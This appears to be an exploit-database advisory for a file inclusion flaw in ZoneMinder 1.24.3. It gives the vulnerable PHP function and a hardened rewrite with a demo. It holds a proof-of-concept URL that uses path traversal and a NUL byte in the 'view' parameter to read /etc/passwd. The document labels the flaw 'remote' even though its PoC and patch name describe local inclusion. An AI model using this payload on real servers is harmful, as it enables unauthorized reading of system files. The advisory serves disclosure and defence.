Vendor: Zoneminder
By: Iye
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Zoneminder
Affected Version From: 1.24.3
Affected Version To: 1.24.4
Patch Exists: YES
Related CWE: N/A
CPE: a:zoneminder:zoneminder:1.24.3
Platforms Tested: Ubuntu 10.04
2011

Zoneminder 1.24.3 Remote File Inclusion Vulnerability

A vulnerability in Zoneminder 1.24.3 allows an authenticated user to include remote files via a crafted URL. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'view' parameter of the 'index.php' script. An attacker can exploit this vulnerability to include arbitrary remote files and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.

Exploit-DB raw data:

# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Date: 2011-07-22
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04

You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.

POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00

Reported to project maintainer (Philip Coombes) on 2011-07-22
Fix patch made by Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt

Vulnerable Code:

/var/www/zm/includes/functions.php
--------------------------------------------------------

function getSkinFile( $file )
{
    global $skinBase;
    $skinFile = false;
    foreach ( $skinBase as $skin )
    {
        $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
        if ( file_exists( $tempSkinFile ) )
            $skinFile = $tempSkinFile;
    }
    return( $skinFile );
}

--------------------------------------------------------
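
A hardened counterpart to the getSkinFile() shown above, as an added example: it is not ZoneMinder's code and not the vendor's lfi-patch.txt. The function name getSkinFileSafe(), its parameters, the allowed-character rule and the throwaway skin tree used in the demo are assumptions made for illustration.

```php
<?php
// Added example (hypothetical): validates $file before it reaches the filesystem,
// then confirms the resolved path is still inside the skins directory.
function getSkinFileSafe(array $skinBase, string $file, string $skinsRoot)
{
    // Allow only slash-separated segments of [A-Za-z0-9_-] plus one extension.
    // This rejects "..", NUL bytes (the %00 in the PoC), backslashes and
    // absolute paths. The D modifier stops "$" matching before a trailing newline.
    if (!preg_match('#^[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*\.[A-Za-z0-9]+$#D', $file)) {
        return false;
    }
    $root = realpath($skinsRoot);
    if ($root === false) {
        return false;
    }
    $skinFile = false;
    foreach ($skinBase as $skin) {
        // realpath() resolves symlinks and returns false for missing files.
        $candidate = realpath($root . '/' . $skin . '/' . $file);
        // Containment check: the resolved path must stay under the skins root.
        if ($candidate !== false && is_file($candidate)
            && strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0) {
            $skinFile = $candidate; // later skins override earlier ones, as in the original
        }
    }
    return $skinFile;
}

// Constructed demo: a throwaway skins tree in the temp directory.
$root = sys_get_temp_dir() . '/zm_demo_' . getmypid() . '/skins';
mkdir($root . '/classic/views', 0700, true);
file_put_contents($root . '/classic/views/console.php', '<?php // demo view');

$inputs = [
    'views/console.php',                  // legitimate view name
    "views/../../../../etc/passwd\0.php", // traversal plus NUL, as in the PoC
    '/etc/passwd',                        // absolute path
];
foreach ($inputs as $in) {
    $result = getSkinFileSafe(['classic'], $in, $root);
    printf("%-40s => %s\n", str_replace("\0", '%00', $in),
        $result === false ? 'rejected' : 'accepted');
}
```

Only the first input is accepted. The other two are rejected by the pattern check before any filesystem call is made.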